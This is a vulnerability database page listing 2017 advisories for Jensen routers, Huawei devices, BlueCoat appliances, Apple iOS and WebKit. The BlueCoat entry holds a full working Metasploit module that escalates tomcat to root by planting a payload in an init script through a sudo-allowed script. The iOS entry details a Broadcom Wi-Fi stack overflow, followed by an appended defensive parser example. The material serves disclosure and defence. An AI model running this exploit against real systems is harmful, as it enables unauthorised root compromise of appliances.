VARIoT IoT vulnerabilities database


VAR-201704-0070 CVE-2016-10315 Open redirect vulnerability in multiple Jensen of Scandinavia AS Air:Link devices CVSS V2: 5.8
CVSS V3: 6.1
Severity: MEDIUM
Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the submit-url parameter to certain /goform/* pages. Air:Link 3G, Air:Link 5000AC and Air:Link 59300 are routers made by Jensen of Scandinavia AS in Norway. An attacker can construct a malicious URI, entice the user to open it, and redirect the user to an arbitrary web site for phishing. Several Jensen of Scandinavia AS Air:Link products are affected: Air:Link 3G (AL3G) 2.23m (Rev. 3); Air:Link 5000AC (AL5000AC) prior to 1.13; Air:Link 59300 (AL59300) 1.04 (Rev. 4).
VAR-201704-0071 CVE-2016-10316 Open redirect vulnerability in multiple Jensen of Scandinavia AS Air:Link devices CVSS V2: 5.8
CVSS V3: 6.1
Severity: MEDIUM
Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the return-url parameter to /goform/formLogout. Air:Link 3G, Air:Link 5000AC and Air:Link 59300 are routers made by Jensen of Scandinavia AS in Norway. An attacker can construct a malicious URI, entice the user to open it, and redirect the user to an arbitrary web site for phishing. Several Jensen of Scandinavia AS Air:Link products are affected: Air:Link 3G (AL3G) 2.23m (Rev. 3); Air:Link 5000AC (AL5000AC) prior to 1.13; Air:Link 59300 (AL59300) 1.04 (Rev. 4).
VAR-201704-0485 CVE-2016-9091 OS command injection vulnerability in Blue Coat Advanced Secure Gateway and Content Analysis System CVSS V2: 9.0
CVSS V3: 7.2
Severity: HIGH
Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. Blue Coat Advanced Secure Gateway (ASG) and Content Analysis System (CAS) are products of Blue Coat Systems, USA. ASG is a secure web gateway appliance; CAS is a malware analysis system that integrates an application whitelist with a dual anti-malware signature database. Multiple Blue Coat products are prone to a command-injection vulnerability because they fail to properly sanitize user-supplied input. This may aid in further attacks. The following products are affected: Advanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. Content Analysis System 1.3 prior to 1.3.7.4 is vulnerable.

# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS
# Date: April 3, 2017
# Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd
# Contact: chrisdhebert[at]gmail.com
# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138
# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable
# Tested on: BlueCoat CAS 1.3.7.1
# CVE : cve-2016-9091

Timeline:
--------
08/31/2016 (Vulnerabilities Discovered)
03/31/2017 (Final Vendor Patch Confirmed)
04/03/2017 (Public Release)

Description:
The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerability. A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script.

Proof of Concept: Metasploit Module - root priv escalation (via mvtroubleshooting.sh)
-----------------

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'rex'
    require 'msf/core/exploit/local/linux'
    require 'msf/core/exploit/exe'

    class Metasploit4 < Msf::Exploit::Local
      Rank = AverageRanking

      include Msf::Exploit::EXE
      include Msf::Post::File
      include Msf::Exploit::Local::Linux

      def initialize(info={})
        super( update_info( info, {
          'Name'           => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
          'Description'    => %q{
            This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate privileges. In order to work, a tomcat session with access to sudo on the sudoers is needed. This module is useful for post exploitation of BlueCoat vulnerabilities, where typically web server privileges are acquired, and this user is allowed to execute sudo on the sudoers file.
          },
          'License'        => MSF_LICENSE,
          'Author'         => [
            'Chris Hebert <chrisdhebert[at]gmail.com>',
            'Pete Paccione <petepaccione[at]gmail.com>',
            'Corey Boyd <corey.k.boyd[at]gmail.com>'
          ],
          'DisclosureDate' => 'Vendor Contacted 8-31-2016',
          'References'     => [
            ['EDB', '##TBD##'],
            ['CVE', '2016-9091' ],
            ['URL', 'https://bto.bluecoat.com/security-advisory/sa138']
          ],
          'Platform'       => %w{ linux unix },
          'Arch'           => [ ARCH_X86 ],
          'SessionTypes'   => [ 'shell', 'meterpreter' ],
          'Targets'        => [
            [ 'Linux x86', { 'Arch' => ARCH_X86 } ]
          ],
          'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
          'DefaultTarget'  => 0,
        } ))
        register_options([
          OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
        ], self.class)
      end

      def check
        id=cmd_exec("id -un")
        if id!="tomcat"
          print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
          fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
        end
        clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
        if clprelease!="1.3.7.1"
          print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
          fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
        end
        return Exploit::CheckCode::Vulnerable
      end

      def exploit
        print_status("#{peer} - Checking for vulnerable BlueCoat session...")
        if check != CheckCode::Vulnerable
          fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
        end
        print_status("#{peer} - Running Exploit...")
        exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
        write_file(exe_file, generate_payload_exe)
        cmd_exec "chmod +x #{exe_file}"
        begin
          #Backup original nscd init script
          cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
          #Replaces /etc/init.d/nscd script with meterpreter payload
          cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
          #Executes meterpreter payload as root
          cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
          #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
        ensure
          #Restores original nscd init script
          cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
          #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
          cmd_exec "/bin/rm -f #{exe_file}"
        end
        print_status("#{peer} - The exploit module has finished")
        #Maybe something here to deal with timeouts?? noticed inconsistent.. Exploit failed: Rex::TimeoutError Operation timed out.
      end
    end
VAR-201704-1558 CVE-2017-6975 Buffer overflow vulnerability in Apple iOS CVSS V2: 7.2
CVSS V3: 6.8
Severity: MEDIUM
Wi-Fi in Apple iOS before 10.3.1 does not prevent CVE-2017-6956 stack buffer overflow exploitation via a crafted access point. NOTE: because an operating system could potentially isolate itself from CVE-2017-6956 exploitation without patching Broadcom firmware functions, there is a separate CVE ID for the operating-system behavior. Apple iOS is prone to an arbitrary code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Versions prior to iOS 10.3.1 are vulnerable. Apple iOS is an operating system developed by Apple for mobile devices; Wi-Fi is its wireless Internet access component.

APPLE-SA-2017-04-03-1 iOS 10.3.1

iOS 10.3.1 is now available and addresses the following:

Wi-Fi
Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later
Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip
Description: A stack buffer overflow was addressed through improved input validation.
CVE-2017-6975: Gal Beniamini of Google Project Zero

Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: navigate to Settings, select General, select About. The version after applying this update will be "10.3.1". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/

Broadcom: Stack buffer overflow when handling 802.11r (FT) authentication response
CVE-2017-6975

Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS.

In order to allow fast roaming between access points in a wireless network, the Broadcom firmware supports the Fast BSS Transition feature (IEEE 802.11r-2008 FT), allowing a client to roam between APs in the same mobility domain. When a client decides to roam to a different AP in an FT network (in the same mobility domain), it first sends an authentication request frame. This frame is either sent to the new AP (in over-the-air FT) or to the original AP (in over-the-DS FT). The authentication request frame includes the Fast BSS Transition Information Element (FT-IE) specifying the R0 key holder ID (R0KH-ID) corresponding to the roam request. In response, the AP sends back an authentication response frame, also containing an FT-IE. This FT-IE contains the regular fields (Anonce, Snonce, etc.) but also includes the R0KH-ID and R1KH-ID. This is done by encoding the additional fields as TLVs immediately after the structure of the FT-IE (but still within the bounds of the IE), like so:

    ----------------------------------------------------------------------------
    | FT-IE Tag (55) | FT-IE Length | ... FT-IE Contents ... | Additional TLVs |
    ----------------------------------------------------------------------------
    0                1              2                        84                2 + FT-IE Length

On the BCM4339 SoC with firmware version 6.37.34.40 the authentication response frame for FT roaming is handled by ROM function 0x7B6A4. This function first retrieves the FT-IE. Then, it allocates a heap buffer for it, using the size specified in the IE's length field. The FT-IE is then stored in the allocated buffer, which is subsequently used to extract the R0KH-ID and R1KH-ID fields. Here is the high-level logic for this function:

    void function_7B6A4(...)
    {
        //Copying in the FT-IE
        char* ft_ie = bcm_parse_tlvs(auth_frame, auth_frame_len, 55);
        unsigned short ft_ie_len = ft_ie[1] + 2;
        char* ft_ie_buffer = malloc(ft_ie_len);
        memcpy(ft_ie_buffer, ft_ie, ft_ie_len);

        //Extracting the embedded IEs in the FT-IE. The size of the
        //FT-IE's fields without the embedded IEs is 84.
        char* ies = ft_ie_buffer + 84;
        int ies_length = ft_ie_len - 84;
        char* r0kh_id = bcm_parse_tlvs(ies, ies_length, 1);
        char* r1kh_id = bcm_parse_tlvs(ies, ies_length, 3);

        memcpy(..., ft_ie + 20, 0x20); //Copying the Anonce
        ...
    }

First, it should be noted that the function erroneously assumes the size of the FT-IE is at least 84. An attacker could include a shorter FT-IE, causing the function to copy 0x20 bytes from (ft_ie + 20), which are stored as the AP's Anonce.

Second, after extracting the R0KH-ID and R1KH-ID fields, the function proceeds to calculate the PTK. To do so, the value of PMK-R0 must first be derived. According to IEEE 802.11r-2008 - 8.5.1.5.3, the PMK-R0 is derived as follows:

    R0-Key-Data = KDF-384(XXKey, "FT-R0", SSIDlength || SSID || MDID || R0KHlength || R0KH-ID || S0KH-ID)
    PMK-R0 = L(R0-Key-Data, 0, 256)
    PMK-R0Name-Salt = L(R0-Key-Data, 256, 128)

(see also "wpa_derive_pmk_r0" under https://w1.fi/cgit/hostap/plain/src/common/wpa_common.c)

This calculation is performed by ROM function 0x13C94, which uses the R0KH-ID that was parsed earlier from the FT-IE in the authentication response frame. The function has approximately the following logic:

    void function_13C94(...)
    {
        char buffer[128];
        ...
        memcpy(buffer, "FT-R0", strlen("FT-R0"));
        buffer += strlen("FT-R0");
        memcpy(buffer, &ssid_length, 1);
        buffer += 1;
        memcpy(buffer, ssid, ssid_length);
        buffer += ssid_length;
        memcpy(buffer, &mdid, 2);
        buffer += 2;
        memcpy(buffer, r0kh_id, r0kh_id_len);
        buffer += r0kh_id_len;
        ...
    }

Where "r0kh_id" is the contents of the R0KH-ID field that was extracted from the FT-IE, and "r0kh_id_len" is the length of the extracted field. Since the R0KH-ID field's length is not validated, an attacker can include an extremely long field within a crafted FT-IE (specifically, the R0KH-ID's length can be at most MAX_IE_SIZE + IE_HEADER_SIZE - FT_IE_SIZE = 255 + 2 - 84 = 173). This would cause the stack-allocated buffer to be overflown, corrupting the stack with attacker-controlled data.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Found by: laginimaineb
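The two missing checks described above, in a bounds-checked FT-IE parser written for this entry as an added example (it is not Broadcom firmware code and not from the Project Zero report): the FT-IE must carry its full 84-byte fixed part before the Anonce or any sub-element is read, and the R0KH-ID length is capped at the protocol maximum so it can never exceed the 128-byte KDF input buffer. Sub-element IDs follow IEEE 802.11r (1 = R1KH-ID, 3 = R0KH-ID), which is the reverse of the labels in the pseudocode above; the test frame builder produces constructed input, not a capture.

```c
/* Added example (written for this entry; not Broadcom code and not from the
 * Project Zero report): bounds-checked FT-IE parsing for an 802.11r
 * authentication response, with the two checks the page says the ROM lacks.
 * Sub-element IDs follow IEEE 802.11r (1 = R1KH-ID, 3 = R0KH-ID). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FT_IE_TAG       55
#define FT_IE_FIXED_LEN 84   /* 2 hdr + MIC control 2 + MIC 16 + ANonce 32 + SNonce 32 */
#define ANONCE_OFF      20   /* 2 hdr + MIC control 2 + MIC 16 */
#define SUBIE_R0KH_ID   3    /* R1KH-ID (id 1) is parsed the same way; omitted here */
#define R0KH_ID_MAX     48   /* IEEE 802.11r: R0KH-ID is 1..48 octets */

typedef struct {
    uint8_t anonce[32];
    uint8_t r0kh_id[R0KH_ID_MAX];
    uint8_t r0kh_id_len;
} ft_ie_t;

/* Locate TLV `tag` in buf[0..len); an element whose declared length would
 * overrun the buffer is rejected rather than read past the end. */
static const uint8_t *find_tlv(const uint8_t *buf, size_t len, uint8_t tag)
{
    for (size_t off = 0; off + 2 <= len; off += 2 + buf[off + 1]) {
        if (off + 2 + buf[off + 1] > len)
            return NULL;                              /* truncated element */
        if (buf[off] == tag)
            return buf + off;
    }
    return NULL;
}

/* Returns 0 on success or a distinct negative code per malformation. */
int parse_ft_ie(const uint8_t *frame, size_t frame_len, ft_ie_t *out)
{
    const uint8_t *ie = find_tlv(frame, frame_len, FT_IE_TAG);
    if (!ie)
        return -1;
    size_t ie_len = (size_t)ie[1] + 2;
    /* Check 1 (absent in function_7B6A4): the 84-byte fixed part must exist
     * before ANonce is read at offset 20 or bytes past 84 are parsed as TLVs. */
    if (ie_len < FT_IE_FIXED_LEN)
        return -2;
    memcpy(out->anonce, ie + ANONCE_OFF, sizeof out->anonce);

    const uint8_t *sub = ie + FT_IE_FIXED_LEN;
    size_t sub_len = ie_len - FT_IE_FIXED_LEN;        /* at most 255 + 2 - 84 = 173 */
    const uint8_t *r0 = find_tlv(sub, sub_len, SUBIE_R0KH_ID);
    if (!r0)
        return -3;
    /* Check 2 (absent in function_13C94): bound the R0KH-ID before keeping it.
     * Capped at 48, the KDF input "FT-R0" || SSIDlength || SSID || MDID ||
     * R0KHlength || R0KH-ID || S0KH-ID is at most 5+1+32+2+1+48+6 = 95 bytes,
     * which fits the 128-byte stack buffer with room to spare. */
    if (r0[1] == 0 || r0[1] > R0KH_ID_MAX)
        return -4;
    out->r0kh_id_len = r0[1];
    memcpy(out->r0kh_id, r0 + 2, r0[1]);
    return 0;
}

/* Constructed test input (not a capture): one FT-IE with zeroed fixed fields
 * except ANonce (0x41), followed by an R0KH-ID sub-element of r0_len bytes.
 * Returns the frame length, or 0 if it would not fit a single IE. */
size_t build_test_frame(uint8_t *buf, size_t cap, uint8_t r0_len)
{
    size_t body = FT_IE_FIXED_LEN - 2 + 2 + r0_len;
    if (body > 255 || 2 + body > cap)
        return 0;
    memset(buf, 0, 2 + body);
    buf[0] = FT_IE_TAG;
    buf[1] = (uint8_t)body;
    memset(buf + ANONCE_OFF, 0x41, 32);
    size_t off = FT_IE_FIXED_LEN;
    buf[off++] = SUBIE_R0KH_ID;
    buf[off++] = r0_len;
    memset(buf + off, 'R', r0_len);
    return off + r0_len;
}

/* Builds a frame with an R0KH-ID of r0_len bytes and returns parse_ft_ie's code
 * (-100 if the frame could not be built at all). */
int parse_result_for_r0kh_len(uint8_t r0_len)
{
    uint8_t f[300];
    ft_ie_t ie;
    size_t n = build_test_frame(f, sizeof f, r0_len);
    return n ? parse_ft_ie(f, n, &ie) : -100;
}

/* An FT-IE declaring only 10 content bytes: too short to even hold ANonce. */
int parse_result_for_short_ie(void)
{
    uint8_t f[12] = {FT_IE_TAG, 10};
    ft_ie_t ie;
    return parse_ft_ie(f, sizeof f, &ie);
}

int main(void)
{
    printf("48-byte R0KH-ID: %d, 60-byte R0KH-ID: %d, short FT-IE: %d\n",
           parse_result_for_r0kh_len(48), parse_result_for_r0kh_len(60),
           parse_result_for_short_ie());
    return 0;
}
```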
VAR-201704-0573 CVE-2017-5949 Denial of service (DoS) vulnerability in JavaScriptCore in WebKit as distributed in Safari Technology Preview CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
JavaScriptCore in WebKit, as distributed in Safari Technology Preview Release 22, allows remote attackers to cause a denial of service (heap-based out-of-bounds write and application crash) or possibly have unspecified other impact via crafted JavaScript code that triggers access to red-zone memory locations, related to jit/ThunkGenerators.cpp, llint/LowLevelInterpreter32_64.asm, and llint/LowLevelInterpreter64.asm. WebKit is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, resulting in a denial-of-service condition. Apple Safari Technology Preview is a browser from Apple. WebKit is an open source web browser engine developed by the KDE community and currently used by browsers such as Apple Safari and Google Chrome. A security vulnerability exists in JavaScriptCore in WebKit as released in Apple Safari Technology Preview Release 22.
VAR-201704-0062 CVE-2016-10222 Denial of service (DoS) vulnerability in runtime/JSONObject.cpp in JavaScriptCore in WebKit as distributed in Safari Technology Preview CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
runtime/JSONObject.cpp in JavaScriptCore in WebKit, as distributed in Safari Technology Preview Release 18, allows remote attackers to cause a denial of service (segmentation violation and application crash) via crafted JavaScript code that triggers a "type confusion" in the JSON.stringify function. Apple Safari Technology Preview is a browser from Apple. WebKit is an open source web browser engine developed by the KDE community and currently used by browsers such as Apple Safari and Google Chrome. A security vulnerability exists in the runtime/JSONObject.cpp file of WebKit's JavaScriptCore in Apple Safari Technology Preview Release 18.
VAR-201704-0173 CVE-2015-8670 Input validation vulnerability in Huawei LogCenter CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
Huawei LogCenter V100R001C10 could allow an authenticated attacker to add abnormal device information to the log collection module, causing denial of service. Huawei LogCenter contains an input validation vulnerability that can be used for a denial of service (DoS) attack. Huawei LogCenter is log management software from Huawei, China. A denial of service vulnerability exists in Huawei LogCenter V100R001C10; it stems from the lack of validity checking on incoming device information data.
VAR-201704-0396 CVE-2015-7844 Input validation vulnerability in Huawei FusionAccess software CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Huawei FusionAccess with software V100R005C10,V100R005C20 could allow attackers to craft and send a malformed HDP protocol packet to cause the virtual cloud desktop to display an error and become unusable. Huawei FusionAccess software contains an input validation vulnerability that can be used for a denial of service (DoS) attack. Huawei FusionAccess is the desktop management system of Huawei's FusionCloud desktop cloud solution; it distributes, maintains and recycles virtual desktops for users through a graphical portal interface. An input validation vulnerability exists in Huawei FusionAccess V100R005C10 and V100R005C20.
VAR-201704-0448 CVE-2014-9136 CSRF vulnerability against users of the web interface in Huawei FusionManager software CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
Huawei FusionManager with software V100R002C03 and V100R003C00 could allow an unauthenticated, remote attacker to conduct a CSRF attack against the user of the web interface. Huawei FusionManager is management software for hardware devices, virtualized resources and applications, developed by Huawei in China. Cross-site request forgery vulnerabilities exist in Huawei FusionManager V100R002C03 and V100R003C00; a remote attacker could exploit them to perform unauthorized operations.
VAR-201704-0435 CVE-2014-3221 Resource management vulnerability in Huawei Eudemon8000E firmware CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Huawei Eudemon8000E firewall with software V200R001C01SPC800 and earlier versions allows users to log in to the device using Telnet or SSH. When an attacker sends the device a mass of specially structured TCP packets, the login process becomes slow and users may be unable to log in to the device. Huawei Eudemon8000E firmware contains a resource management vulnerability that can be used for a denial of service (DoS) attack. Huawei Eudemon8000E is a new-generation high-performance T-class security gateway for operators from Huawei. Huawei Eudemon8000E V200R001C01SPC800 and previous versions are affected.
VAR-201704-0437 CVE-2014-3223 Data processing vulnerability in multiple Huawei products CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches. Multiple Huawei products contain a data processing vulnerability that can be used for a denial of service (DoS) attack. The S9300, S2300, S3300, S5300 and S6300 are switches from Huawei; an attacker could exploit this vulnerability to reboot the device. The following products and versions are affected: Huawei S9300 V100R006C00SPC500, V100R006C00SPC800; S2300 V100R006C00SPC800, V100R006C01SPC100, V100R006C03; S3300 V100R006C00SPC800, V100R006C01SPC100, V100R006C03; S5300 V100R006C00SPC800, V100R006C01SPC100, V100R006C03; S6300 V100R006C00SPC800, V100R006C01SPC100, V100R006C03.
VAR-201704-0438 CVE-2014-3224 Denial of service (DoS) vulnerability in Huawei Quidway switches CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Huawei Quidway S9700 V200R003C00SPC500, Quidway S9300 V200R003C00SPC500, Quidway S7700 V200R003C00SPC500, Quidway S6700 V200R003C00SPC300, Quidway S6300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300 enable attackers to launch DoS attacks by crafting and sending malformed packets to these vulnerable products. The device may be put into a denial of service (DoS) state. The Quidway S9700, S9300, S7700, S6700, S6300, S5700 and S5300 are switches from Huawei. The following products and versions are affected: Huawei Quidway S9700 V200R003C00SPC500; Quidway S9300 V200R003C00SPC500; Quidway S7700 V200R003C00SPC500; Quidway S6700 V200R003C00SPC500; Quidway S6300 V200R003C00SPC500; Quidway S5700 V200R003C00SPC500; Quidway S5300 V200R003C00SPC500.
VAR-201704-0385 CVE-2014-4706 Buffer error vulnerability in multiple Huawei Campus product software CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow. Multiple Huawei Campus product software contains a buffer error vulnerability that can be used for a denial of service (DoS) attack. Huawei Campus is a series of switches from Huawei. An attacker can exploit this vulnerability with malformed packets to make the device restart abnormally. The following products and versions are affected: Huawei Campus S3700HI V200R001C00SPC300; Campus S5700 V200R002C00SPC100; Campus S7700 V200R003C00SPC300, V200R003C00SPC500; LSW S9700 V200R001C00SPC300, V200R003C00SPC300, V200R003C00SPC500; S2350 V200R003C00SPC300; S2750 V200R003C00SPC300; S5300 V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S5700 V200R001C00SPC300, V200R003C00SPC300; S6300 V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S6700 S3300HI V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S7700 V200R001C00SPC300; S9300 V200R001C00SPC300, V200R003C00SPC300, V200R003C00SPC500; S9300E V200R003C00SPC300, V200R003C00SPC500.
VAR-201704-0386 CVE-2014-4707 Access control vulnerability in multiple Huawei Campus product software CVSS V2: 7.5
CVSS V3: 8.8
Severity: HIGH
Huawei Campus S7700 with software V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S9300 with software V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S9700 with software V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300 allow unauthorized users to upgrade the bootrom or bootload software, bypass a Menu protection mechanism, conduct a Menu compromise attack, or bypass a Menu/upgrade protection mechanism. Huawei Campus S7700, S9300 and S9700 software contains an access control vulnerability; information may be obtained or altered and service operation may be disrupted (DoS). Huawei Campus S7700 is an enterprise-class campus switch from Huawei, China. Huawei's Campus S7700, S9300 and S9700 switches are affected. The following products and versions are affected: Huawei S7700 V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S9300 V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S9700 V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300.
VAR-201704-0464 CVE-2014-8570 IP address disclosure vulnerability in multiple Huawei device product software CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
Huawei S9300, S9303, S9306, S9312 with software V100R002; S7700, S7703, S7706, S7712 with software V100R003, V100R006, V200R001, V200R002, V200R003, V200R005; S9300E, S9303E, S9306E, S9312E with software V200R001; S9700, S9703, S9706, S9712 with software V200R002, V200R003, V200R005; S12708, S12712 with software V200R005; 5700HI, 5300HI with software V100R006, V200R001, V200R002, V200R003, V200R005; 5710EI, 5310EI with software V200R002, V200R003, V200R005; 5710HI, 5310HI with software V200R003, V200R005; 6700EI, 6300EI with software V200R005 could cause a leak of IP addresses of devices, related to unintended interface support for VRP MPLS LSP Ping. Huawei S9300 and the other affected models are S-series switches from Huawei, China. An information disclosure vulnerability exists in several Huawei switches that use the VRP platform. The following products and versions are affected: Huawei S300 V100R002, V100R003, V100R006, V200R001, V200R002, V200R003; S9303 V100R002, V100R003, V200R001, V200R003; V100R003, V100R006, V200R001, V200R002, V200R003; S9312 V100R002, V100R003, V100R006, V200R001, V200R002, V200R003; S7700 V100R002, V100R003, V100R006, V200R001, V200R002, V200R003; S7703 V100R002, V100R003, V100R006, V200R001, V200R002, V200R003; S7706 V100R002, V100R003, V100R006, V200R001, V200R002, V200R003; S7712 V100R002, V100R003, V100R006, V200R001, V200R002, V200R003; S9300E V200R001, V200R002, V200R003, V200R005; S9303E V200R001, V200R002, V200R003, V200R005; S9306E V200R001, V200R002, V200R003, V200R005; S9312E
VAR-201704-0462 CVE-2014-8571 Authorization, authority and access control vulnerability in Huawei Ascend P6 mobile phone applications CVSS V2: 4.3
CVSS V3: 3.3
Severity: LOW
Apps on Huawei Ascend P6 mobile phones with software EDGE-U00 V100R001C17B508SP01 and earlier versions before V100R001C17B508SP02; EDGE-T00 V100R001C01B508SP01 and earlier versions before V100R001C01B508SP02; EDGE-C00 V100R001C92B508SP02 and earlier versions before V100R001C92B508SP03 can capture screens without the root permission. As a result, user information can be leaked by malware on Ascend P6 mobile phones. Huawei P6 is a smartphone from Huawei, China; EDGE-U00, EDGE-T00 and EDGE-C00 are its variants. Huawei P6 has a privilege escalation vulnerability that an attacker can use to perform a screen capture, leaking user information.
VAR-201704-0449 CVE-2014-9137 Multiple Huawei USG products: CSRF vulnerability against users of the web interface CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
Huawei USG9500 with software V200R001C01SPC800 and earlier versions, V300R001C00; USG2100 with software V300R001C00SPC900 and earlier versions; USG2200 with software V300R001C00SPC900; USG5100 with software V300R001C00SPC900 could allow an unauthenticated, remote attacker to conduct a CSRF attack against the user of the web interface. The Huawei USG9500 is a firewall product of China's Huawei. A cross-site request forgery vulnerability exists in several Huawei USG series firewall products. A remote attacker could exploit this vulnerability to perform unauthorized operations. The following products and versions are affected: Huawei USG9500 V200R001C01SPC800 and previous versions, V300R001C00 Version; USG2100 V300R001C00SPC900 and previous versions; USG2200 V300R001C00SPC900 and previous versions; USG5100 V300R001C00SPC900 and previous versions; USG5500 V300R001C00SPC900 and previous versions
VAR-201704-0467 CVE-2014-9690 Huawei WS318 firmware: insufficient PRNG entropy vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Huawei home gateways WS318 with software V100R001C01B022 and earlier versions are affected by the PIN offline brute force cracking vulnerability of the WPS protocol because the random number generator (RNG) used in the supplier's solution is not random enough. As a result, brute force cracking the PIN code is easier. After an attacker cracks the PIN, the attacker can access the Internet via the cracked device. The Huawei WS318 firmware contains a PRNG with insufficient entropy; information may be obtained. The Huawei WS318 is a wireless router product from China's Huawei company. A security vulnerability exists in Huawei WS318 V100R001C01B022 and previous versions
VAR-201704-0468 CVE-2014-9691 Multiple Huawei Tecal products: information disclosure vulnerability CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
